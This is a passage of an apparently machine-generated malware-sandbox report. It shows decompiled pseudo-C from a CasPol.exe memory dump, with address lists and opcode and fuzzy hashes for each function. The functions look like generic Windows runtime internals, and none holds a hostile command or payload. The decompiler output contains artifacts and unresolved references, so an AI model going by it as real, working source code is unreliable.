					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x14a60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L013D4620(0x14a6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x14a6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                        0x013ebc36
                                                                        0x013ebc42
                                                                        0x013ebc45
                                                                        0x013ebc4a
                                                                        0x013ebd35
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ebc50
                                                                        0x013ebc50
                                                                        0x013ebc58
                                                                        0x013ebc5a
                                                                        0x013ebc60
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142a4f2
                                                                        0x0142a4f6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142a4fc
                                                                        0x013ebc79
                                                                        0x013ebc7e
                                                                        0x013ebc86
                                                                        0x013ebd16
                                                                        0x013ebd20
                                                                        0x013ebd20
                                                                        0x013ebc8d
                                                                        0x013ebc94
                                                                        0x013ebcbd
                                                                        0x013ebcca
                                                                        0x013ebccb
                                                                        0x013ebccc
                                                                        0x013ebccd
                                                                        0x013ebcce
                                                                        0x013ebcd4
                                                                        0x013ebcea
                                                                        0x013ebcee
                                                                        0x013ebcf2
                                                                        0x013ebd00
                                                                        0x013ebd04
                                                                        0x00000000
                                                                        0x013ebc96
                                                                        0x013ebcab
                                                                        0x013ebcaf
                                                                        0x013ebd2c
                                                                        0x013ebd2c
                                                                        0x013ebd09
                                                                        0x00000000
                                                                        0x013ebd09
                                                                        0x013ebcb1
                                                                        0x013ebcb5
                                                                        0x013ebcbb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013ebcbb

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5694abf6ca4d60e9c9a4515fbb05d22578496ae10d6e8a65349d9977d04fd0a5
                                                                        • Instruction ID: 3d960a22a2e81fc8abaa9bb537d2e734bdd92473143d308f43cb0cb2f828b4b8
                                                                        • Opcode Fuzzy Hash: 5694abf6ca4d60e9c9a4515fbb05d22578496ae10d6e8a65349d9977d04fd0a5
                                                                        • Instruction Fuzzy Hash: 453131726007268BCB12DF58D4807A7BBB8FF18318F4A4079ED45DB289EB35E9458B80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013B9100 Relevance: .1, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E013B9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x148f6e8);
				E0140D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E014888F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0140D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x14a86c0; // 0xf507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x14a86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E013D2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E014888F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E013FAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x14ab1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x14a84c0;
										if(_t69 >=  *0x14a84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01489063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E013B922A(_t82);
							_t53 = E013D7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01488B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x14a86c0; // 0xf507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x14a86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x14a86bc;
										_t72 = 0x14a86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E013B9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x14a86c4;
									_t72 = 0x14a86c0;
									L18:
									E013E9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                        0x013b9100
                                                                        0x013b9100
                                                                        0x013b9100
                                                                        0x013b9100
                                                                        0x013b9102
                                                                        0x013b9107
                                                                        0x013b910c
                                                                        0x013b9110
                                                                        0x013b9115
                                                                        0x013b9136
                                                                        0x013b9143
                                                                        0x014137e4
                                                                        0x014137e4
                                                                        0x013b9149
                                                                        0x013b914e
                                                                        0x013b914e
                                                                        0x013b9117
                                                                        0x013b911d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013b911f
                                                                        0x013b9125
                                                                        0x00000000
                                                                        0x013b9151
                                                                        0x013b9158
                                                                        0x013b915d
                                                                        0x013b9161
                                                                        0x013b9168
                                                                        0x01413715
                                                                        0x00000000
                                                                        0x013b916e
                                                                        0x013b916e
                                                                        0x013b9175
                                                                        0x013b9177
                                                                        0x013b917e
                                                                        0x013b917f
                                                                        0x013b9182
                                                                        0x013b9182
                                                                        0x013b9187
                                                                        0x013b9187
                                                                        0x013b918a
                                                                        0x013b918d
                                                                        0x013b918f
                                                                        0x013b9192
                                                                        0x013b9195
                                                                        0x013b9198
                                                                        0x013b9198
                                                                        0x013b9198
                                                                        0x013b919a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141371f
                                                                        0x01413721
                                                                        0x01413727
                                                                        0x0141372f
                                                                        0x01413733
                                                                        0x01413735
                                                                        0x01413738
                                                                        0x0141373b
                                                                        0x0141373d
                                                                        0x01413740
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01413746
                                                                        0x01413749
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141374f
                                                                        0x01413751
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01413757
                                                                        0x01413759
                                                                        0x0141375c
                                                                        0x0141375c
                                                                        0x0141375e
                                                                        0x0141375e
                                                                        0x01413761
                                                                        0x01413764
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01413766
                                                                        0x01413768
                                                                        0x014137a3
                                                                        0x014137a3
                                                                        0x014137a5
                                                                        0x014137a7
                                                                        0x014137ad
                                                                        0x014137b0
                                                                        0x014137b2
                                                                        0x014137bc
                                                                        0x014137c2
                                                                        0x014137c2
                                                                        0x014137b2
                                                                        0x013b9187
                                                                        0x013b9187
                                                                        0x013b918a
                                                                        0x013b918d
                                                                        0x013b918f
                                                                        0x013b9192
                                                                        0x013b9195
                                                                        0x00000000
                                                                        0x013b9195
                                                                        0x00000000
                                                                        0x013b9187
                                                                        0x0141376a
                                                                        0x0141376a
                                                                        0x0141376c
                                                                        0x0141376c
                                                                        0x0141376f
                                                                        0x01413775
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01413777
                                                                        0x01413779
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01413782
                                                                        0x01413787
                                                                        0x01413789
                                                                        0x01413790
                                                                        0x01413790
                                                                        0x0141378b
                                                                        0x0141378b
                                                                        0x0141378b
                                                                        0x01413792
                                                                        0x01413795
                                                                        0x01413795
                                                                        0x01413798
                                                                        0x01413798
                                                                        0x0141379b
                                                                        0x0141379b
                                                                        0x013b91a3
                                                                        0x013b91a9
                                                                        0x013b91b0
                                                                        0x013b91b4
                                                                        0x013b91b4
                                                                        0x013b91bb
                                                                        0x013b91c0
                                                                        0x013b91c5
                                                                        0x013b91c7
                                                                        0x014137da
                                                                        0x013b91cd
                                                                        0x013b91cd
                                                                        0x013b91cd
                                                                        0x013b91d2
                                                                        0x013b91d5
                                                                        0x013b9239
                                                                        0x013b9239
                                                                        0x013b91d7
                                                                        0x013b91db
                                                                        0x013b91e1
                                                                        0x013b91e7
                                                                        0x013b91fd
                                                                        0x013b9203
                                                                        0x013b921e
                                                                        0x013b9223
                                                                        0x00000000
                                                                        0x013b9223
                                                                        0x013b9205
                                                                        0x013b9208
                                                                        0x013b920c
                                                                        0x013b9214
                                                                        0x013b9214
                                                                        0x013b91e9
                                                                        0x013b91e9
                                                                        0x013b91ee
                                                                        0x013b91f3
                                                                        0x013b91f3
                                                                        0x013b91f3
                                                                        0x013b91e7
                                                                        0x00000000
                                                                        0x013b91db
                                                                        0x013b9187
                                                                        0x013b9168

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4917c073226dbc33fc7913c6da58ac42e937f1dfd0fa951aea7329b1366ee63c
                                                                        • Instruction ID: 66ecf5dbb3debb38d69c7c9f1ae120f5d847c4a7f2ae8906831e25f7106ef1b6
                                                                        • Opcode Fuzzy Hash: 4917c073226dbc33fc7913c6da58ac42e937f1dfd0fa951aea7329b1366ee63c
                                                                        • Instruction Fuzzy Hash: B1318FB1A00246DFEB22DF6CC0887DDBBB1BB9831CF59815EC71467661D330A980DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E1DB5 Relevance: .1, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E013E1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E013DF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L013D4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E013DF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                        0x013e1dc2
                                                                        0x013e1dc5
                                                                        0x013e1dc7
                                                                        0x013e1dcc
                                                                        0x013e1dce
                                                                        0x013e1dd6
                                                                        0x013e1ddf
                                                                        0x013e1de0
                                                                        0x013e1de1
                                                                        0x013e1de5
                                                                        0x013e1de8
                                                                        0x013e1def
                                                                        0x013e1df0
                                                                        0x013e1df6
                                                                        0x013e1df7
                                                                        0x013e1dfe
                                                                        0x013e1e1a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e1e0b
                                                                        0x013e1e12
                                                                        0x013e1e12
                                                                        0x013e1e00
                                                                        0x013e1e00
                                                                        0x013e1e05
                                                                        0x013e1e1e
                                                                        0x013e1e23
                                                                        0x0142570f
                                                                        0x01425713
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425719
                                                                        0x01425719
                                                                        0x013e1e2c
                                                                        0x013e1e2d
                                                                        0x013e1e2e
                                                                        0x013e1e2f
                                                                        0x013e1e31
                                                                        0x013e1e32
                                                                        0x013e1e35
                                                                        0x013e1e3d
                                                                        0x01425723
                                                                        0x0142573d
                                                                        0x0142573d
                                                                        0x00000000
                                                                        0x01425723
                                                                        0x013e1e49
                                                                        0x013e1e4e
                                                                        0x013e1e4e
                                                                        0x013e1e09
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                        • Instruction ID: 22cc1b5ecb4f64dab1da272f858e18264764428d9b4bebe2e94d61d15e83be2b
                                                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                        • Instruction Fuzzy Hash: 00218372600229EFD721CF5DDC84FABBBBDEF85658F154055F609A7290D634AE01C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013D0050 Relevance: .1, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E013D0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x14ad360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E013E9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E013FB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01488A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E013E9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x14ab1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                        0x013d0055
                                                                        0x013d005d
                                                                        0x013d0062
                                                                        0x013d006c
                                                                        0x013d006f
                                                                        0x013d0074
                                                                        0x013d007a
                                                                        0x013d007a
                                                                        0x013d0080
                                                                        0x013d0080
                                                                        0x013d0087
                                                                        0x013d008d
                                                                        0x013d008f
                                                                        0x013d0093
                                                                        0x013d0095
                                                                        0x013d009b
                                                                        0x013d00f8
                                                                        0x013d00fb
                                                                        0x013d00fc
                                                                        0x013d00ff
                                                                        0x013d0108
                                                                        0x013d0108
                                                                        0x013d00a2
                                                                        0x013d00a6
                                                                        0x013d00b3
                                                                        0x013d00bc
                                                                        0x013d00c5
                                                                        0x013d00ca
                                                                        0x0141c01e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0141c02d
                                                                        0x013d00d5
                                                                        0x013d00d9
                                                                        0x0141c03d
                                                                        0x0141c046
                                                                        0x0141c046
                                                                        0x013d00df
                                                                        0x013d00e2
                                                                        0x013d00ea
                                                                        0x013d00ef
                                                                        0x013d00f2
                                                                        0x013d00f6
                                                                        0x013d0111
                                                                        0x013d0117
                                                                        0x013d0117
                                                                        0x00000000
                                                                        0x013d00f6
                                                                        0x013d00d0
                                                                        0x013d00d0
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca77801729815d2418598463a3b038fa20206d4af9010e15d38a1391c2f8032c
                                                                        • Instruction ID: d9ee0cb058efee56b0b699cf80471deb55c079c811b609c5dbb090651a00fcc6
                                                                        • Opcode Fuzzy Hash: ca77801729815d2418598463a3b038fa20206d4af9010e15d38a1391c2f8032c
                                                                        • Instruction Fuzzy Hash: D631C132201B04DFD726CF2CD844B5AB7E5FF88718F14456DE59687BA0EB71A801CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01436C0A Relevance: .1, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E01436C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E013D7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x14a7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L013D4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E013FF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E013D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E013F9AE0();
						_t23 = L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                        0x01436c0a
                                                                        0x01436c0f
                                                                        0x01436c10
                                                                        0x01436c13
                                                                        0x01436c15
                                                                        0x01436c19
                                                                        0x01436c1c
                                                                        0x01436c21
                                                                        0x01436c28
                                                                        0x01436c3a
                                                                        0x01436c2a
                                                                        0x01436c33
                                                                        0x01436c33
                                                                        0x01436c3f
                                                                        0x01436c48
                                                                        0x01436c4d
                                                                        0x01436c60
                                                                        0x01436c65
                                                                        0x01436c69
                                                                        0x01436c73
                                                                        0x01436c79
                                                                        0x01436c7f
                                                                        0x01436c86
                                                                        0x01436c90
                                                                        0x01436c94
                                                                        0x01436ca6
                                                                        0x01436cb2
                                                                        0x01436cbd
                                                                        0x01436cbd
                                                                        0x01436cc3
                                                                        0x01436cc7
                                                                        0x01436ccb
                                                                        0x01436cd0
                                                                        0x01436cd1
                                                                        0x01436ce2
                                                                        0x01436ce2
                                                                        0x01436c69
                                                                        0x01436ced

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 82f72a9ffae52865c629857010ec3430700a4465736a7fc8199acc80e9fc9b7e
                                                                        • Instruction ID: 9a51bd06fed919b173eb4860c2e74d5ba6caa43c0fa1dd85dbca218cc5e675b2
                                                                        • Opcode Fuzzy Hash: 82f72a9ffae52865c629857010ec3430700a4465736a7fc8199acc80e9fc9b7e
                                                                        • Instruction Fuzzy Hash: 5D219C72A00645BFD711DB6CD880F2AB7A8FF48748F15006AF904C77A1D638EE11CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F90AF Relevance: .1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E013F90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0140D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E013EE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L013D4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E013FF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E013EA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                        0x013f90af
                                                                        0x013f90b8
                                                                        0x013f90bb
                                                                        0x013f90bf
                                                                        0x013f90c2
                                                                        0x013f90c2
                                                                        0x013f90c8
                                                                        0x013f90cb
                                                                        0x013f90cd
                                                                        0x014314d7
                                                                        0x014314eb
                                                                        0x014314eb
                                                                        0x00000000
                                                                        0x014314eb
                                                                        0x014314db
                                                                        0x014314e6
                                                                        0x00000000
                                                                        0x014314f2
                                                                        0x014314e8
                                                                        0x00000000
                                                                        0x014314e8
                                                                        0x013f90d8
                                                                        0x013f90da
                                                                        0x013f90dd
                                                                        0x013f90e5
                                                                        0x00000000
                                                                        0x013f9139
                                                                        0x013f90fa
                                                                        0x013f90fe
                                                                        0x013f9142
                                                                        0x00000000
                                                                        0x013f9142
                                                                        0x013f9104
                                                                        0x013f9107
                                                                        0x013f910b
                                                                        0x013f9110
                                                                        0x013f9118
                                                                        0x013f9147
                                                                        0x013f9148
                                                                        0x013f914f
                                                                        0x013f9150
                                                                        0x013f9151
                                                                        0x013f9152
                                                                        0x013f9156
                                                                        0x013f915d
